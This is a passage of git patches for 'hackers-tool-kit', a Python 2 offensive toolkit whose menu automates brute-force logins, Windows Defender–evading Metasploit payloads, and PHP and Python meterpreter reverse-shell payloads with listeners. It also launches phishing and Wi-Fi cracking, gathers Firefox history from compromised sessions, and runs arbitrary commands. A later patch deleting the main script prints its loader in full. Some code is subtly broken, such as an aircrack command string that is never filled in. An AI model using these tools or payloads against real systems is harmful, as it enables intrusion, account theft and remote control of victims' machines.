RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +#------------------# +#FIND HASH TYPE END# + + +#RESTART SCRIPT START# +#--------------------# +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +#------------------# +#RESTART SCRIPT END# + + +#MEDUSA AUTOMATED START# +#----------------------# +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +#--------------------# +#MEDUSA AUTOMATED END# + + +#WAF DETECTER START# +#------------------# +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +#----------------# +#WAF DETECTER END# + + +#CLOUDFLARE BYPASS START# +#-----------------------# +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +#---------------------# +#CLOUDFLARE BYPASS END# + + +#BRUTEFORCE ALL SERVICES ON WEB START# +#------------------------------------# +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +#----------------------------------# +#BRUTEFORCE ALL SERVICES ON WEB END# + + +#METERPRETER HELP MENU START# +#---------------------------# +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +#-------------------------# +#METERPRETER HELP MENU END# + + +#WINDOWS DEFENDER BYPASS START# +#-----------------------------# +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +#---------------------------# +#WINDOWS DEFENDER BYPASS END# + + +#USE A EXPLOIT START# +#-------------------# +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +#-----------------# +#USE A EXPLOIT END# + + +#PHISHING AUTOMATED START# +#------------------------# +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +#----------------------# +#PHISHING AUTOMATED END# + + +#LIST DATABASE INFO START# +#------------------------# +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +#----------------------# +#LIST DATABASE INFO END# + + +#ALL METASPLOIT EVASIONS START# +#-----------------------------# +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +#---------------------------# +#ALL METASPLOIT EVASIONS END# + + +#FULLY UPDATE YOUR OS START# +#--------------------------# +def upgrade(): + os.system("apt update && apt upgrade") +#------------------------# +#FULLY UPDATE YOUR OS END# + + +#USE A NMAP SCRIPT START# +#-----------------------# +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +#---------------------# +#USE A NMAP SCRIPT END# + + +#GET HOST SSH VERSION START# +#--------------------------# +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +#------------------------# +#GET HOST SSH VERSION END# + + +#USE PROXYCHAINS FOR WEB START# +#-----------------------------# +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +#---------------------------# +#USE PROXYCHAINS FOR WEB END# + + +#GET HOST MYSQL VERSION START# +#----------------------------# +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +#--------------------------# +#GET HOST MYSQL VERSION END# + + +#CONNECT TO A HOST START# +#-----------------------# +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +#---------------------# +#CONNECT TO A HOST END# + + + +#OPEN NEW TERMINAL START# +#-----------------------# +def terminal(): + os.system("gnome-terminal") +#---------------------# +#OPEN NEW TERMINAL END# + + +#AIRCRACK-NG [WIFI HACK] AUTOMATED START# +#---------------------------------------# +def aircrack(): + b = raw_input(G+"BSSID: \033[0m") + e = raw_input(G+"ESSID: \033[0m") + w = raw_input(G+"Wordlist: \033[0m") + h = raw_input(G+"Handshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"Interface: \033[0m") + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) +#-------------------------------------# +#AIRCRACK-NG [WIFI HACK] AUTOMATED END# + + +#GET SOURCE CODE OF WEB START# +#----------------------------# +def source(): + t = raw_input(B+"Target:\033[0m ") + print Y+"\nWould you like to save source code in a file?\n\033[0m" + q = raw_input(R+"[y/n]:\033[0m ") + if q == "n": + an = 'curl {0}'.format(t) + os.system(an) + if q == "y": + ay = 'curl {0} >> /root/{1}.txt'.format(t,t) + os.system(ay) + print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) +#--------------------------# +#GET SOURCE CODE OF WEB END# + + +#WEB DIRECTORY SCAN START# +#------------------------# +def dirscan(): + t = raw_input(B+"Target URL:\033[91m ") + print "\033[0m" + a = 'dirb {0}'.format(t) + os.system(a) +#----------------------# +#WEB DIRECTORY SCAN END# + + + +#APACHE SERVER START# +#-------------------# +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print Y+"Starting Server\033[0m..." + os.system("service apache2 start") + br = raw_input(G+"Browser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("hit enter to stop server: ") + print Y+"Stopping Server\033[0m..." + os.system("service apache2 stop") +#-----------------# +#APACHE SERVER END# + + +#CLEAR ALL START# +#---------------# +def clearall(): + os.system("clear") +#-------------# +#CLEAR ALL END# + + +#RUN A FILE START# +#----------------# +def run(): + print Y+"what program do you want to run the file with Example: python" + p = raw_input(N+"Program: ") + print "\n" + print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" + print "\n" + f = raw_input("Enter File: ") + print "\n" + print Y+"would you like to add arguments when running the file [y/n]\033[0m" + yn = raw_input(G+"[y or n]: \033[0m") + if yn == "n" : + a = '{0} {1}'.format(p,f) + os.system(a) + if yn == "y" : + arg = raw_input("Enter Arguments: ") + a = '{0} {1} {2}'.format(p,f,arg) + os.system(a) +#--------------# +#RUN A FILE END# + + +#REFRESH BANNER START# +#--------------------# +def banner(): + os.system("clear") + mainbanner() +#------------------# +#REFRESH BANNER END# + + +#PHP PAYLOAD START# +#-----------------# +def phpload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> phpload.rc') + os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') + os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) + os.system('echo "exploit\n" >> phpload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r phpload.rc') + os.system('rm -rf phpload.rc') + if yn == "n": + os.system('echo " "') +#---------------# +#PHP PAYLOAD END# + + +#PYLOAD START# +#------------# +def pyload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> pyload.rc') + os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') + os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) + os.system('echo "exploit\n" >> pyload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r pyload.rc') + os.system('rm -rf pyload.rc') + if yn == "n": + os.system('echo " "') +#----------# +#PYLOAD END# + + +#FOXHIS START# +#------------# +def foxhis(): + os.system('echo "sessions\n" >> foxhisses.rc') + os.system('echo "exit\n" >> foxhisses.rc') + os.system("service postgresql restart") + os.system('msfconsole -q -r foxhisses.rc') + os.system('rm -rf foxhisses.rc') + print "\n" + ses = raw_input("Session: ") + print "\nMaximum time (seconds) to wait for a response\n" + time = raw_input("Timeout: ") + os.system('echo "use firefox/gather/history\n" >> foxhis.rc') + os.system('echo "set session {0}\n" >> foxhis.rc'.format(ses)) + os.system('echo "set timeout {0}\n" >> foxhis.rc'.format(time)) + os.system('echo "run\n" >> foxhis.rc') + os.system('msfconsole -q -r foxhis.rc') + os.system('rm -fr foxhis.rc') +#----------# +#FOXHIS END# + + +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# +#-------------------------------------------------------------------------------------------------# +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@tuf_unkn0wn\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "terminal": + terminal() + if x == "aircrack": + aircrack() + if x == "source": + source() + if x == "dirscan": + dirscan() + if x == "aserver": + aserver() + if x == "clearall": + clearall() + if x == "run": + run() + if x == "banner": + banner() + if x == "phpload": + phpload() + if x == "pyload": + pyload() + if x == "foxhis": + foxhis() + found = True +mainbanner() +main() +#-------------------------------------------------------------------------------------------------# +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From 0da6abad58803cd84cac6ad9ba4b4ce3f174a555 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Tue, 28 May 2019 05:42:43 +0100 Subject: [PATCH 154/214] Delete htk.py --- htk.py | 2990 -------------------------------------------------------- 1 file changed, 2990 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 785a097..0000000 --- a/htk.py +++ /dev/null @@ -1,2990 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @tuf_unkn0wn -#i do not give you permission to show / edit this script without my credit -#to ask questions or report a problem message me on instagram @unkn0wn_bali -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -#this is the loading screen \ the imports START# -#----------------------------------------------# -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -#COLOR VARIABLES START# -#---------------------# -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -#-------------------# -#COLOR VARIABLES END# - -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -#----------------------------------------------# -#this is the loading screen \ the imports END# - - -#MAIN STARTING BANNER START# -#--------------------------# -def mainbanner1(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def mainbanner2(): - print """ - type ? for help -\033[92m - ▄█ ▄█ ▄█ - ███ ███ ███ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███ ███ ███ - ███ ███ ███ - █▀ █▀ █▀ - - ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ - ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m - ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ - ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m - │ │ ││ ││───├┴┐│ │ - ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m -Created By @tuf_unkn0wn - """.decode('utf-8') -def mainbanner3(): - print """\033[91m - ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ - ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ - ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ - ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ - ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ - ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ - ░░ ░▒ ░ ░░ ░▒ ░ - ░ ░ ░ ░ - ░ ░ ░ ░ - \033[90m - - ████████████████████ - ██ ██\033[91m - ▒▒ ▒▒ - ░░ ░░ - ░ ░ - ░ ░\033[0m - -888 888 88888888888 888 d8P -888 888 888 888 d8P -888 888 888 888 d8P \033[1;36m -8888888888 888 888d88K -888 888 888 8888888b\033[0m -888 888 888888 888 888888 888 Y88b -888 888 888 888 Y88b -888 888 888 888 Y88b - Created By @tuf_unkn0wn On Instagram - type ? for help - """.decode('utf-8') -def mainbanner4(): - print P+""" - .S S. sdSS_SSSSSSbs .S S. - .SS SS. YSSS~S%SSSSSP .SS SS. - S%S S%S S%S S%S S&S - S%S S%S S%S S%S d*S - S%S SSSS%S S&S S&S .S*S - S&S SSS&S S&S S&S_sdSSS - S&S S&S S&S S&S~YSSY%b - S&S S&S S&S S&S `S% - S*S S*S S*S S*S S% - S*S S*S S*S S*S n& - S*S S*S S*S S*S wS& - SSS S*S S*S S*S 0 SS - h SP SP SP n - a Y Y Y k - c n - k e r s - t o o l - k i t by @tuf_u\033[0m - - type ? for help - """.decode('utf-8') -def mainbanner5(): - print R+""" - ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ - ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ - ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ - ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ - ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ - ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ - ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ - ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ - ░\033[0m - .,,,,,,,,,,.,,,.....,........................... - ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, - ..,......,.....,,.,........,,...........,,.,.... - ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ - ***********************//***/***//**/********** - ****************** ****************** @tuf_unkn0wn - *,*****,*,******** ***,************** - **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help - ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, - ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, - ***********************************************\033[91m - - ▄████▄ █ ██ ▄▄▄█████▓ ██████ - ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ - ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ - ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ - ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ - ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ - ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ - ░ ░░░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ - ░ \033[0m - """.decode('utf-8') -def mainbanner6(): - print """ - |-|____________________ - /|_|_\ /__,''___ /____ /| - |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| - |``````|_________|`````| | - | \033[93m~~~~~~~~~~~~~~\033[0m | | - | .-/\-, | | - | _\\//_ | | - | \033[92m| /(_)|\033[0m | | - |\033[92m_______|_||.-.|_______\033[0m|/| - |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| - |\033[92m```````|_||:_)|```````\033[0m| | - | \033[92m|______| \033[0m| | - | ______ | | - | (__\033[90m24\033[0m__) | | - | ~~~~~~~~ | | - | By @tuf_unkn0wn | | - |______________________|/ - \033[91m - ) ( ) ( - ( /( )\ ) ( /( )\ ( ( ( - )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( - ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ - | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) - | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< - |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ - |___/ - \033[90m - ) - (\033[33m - 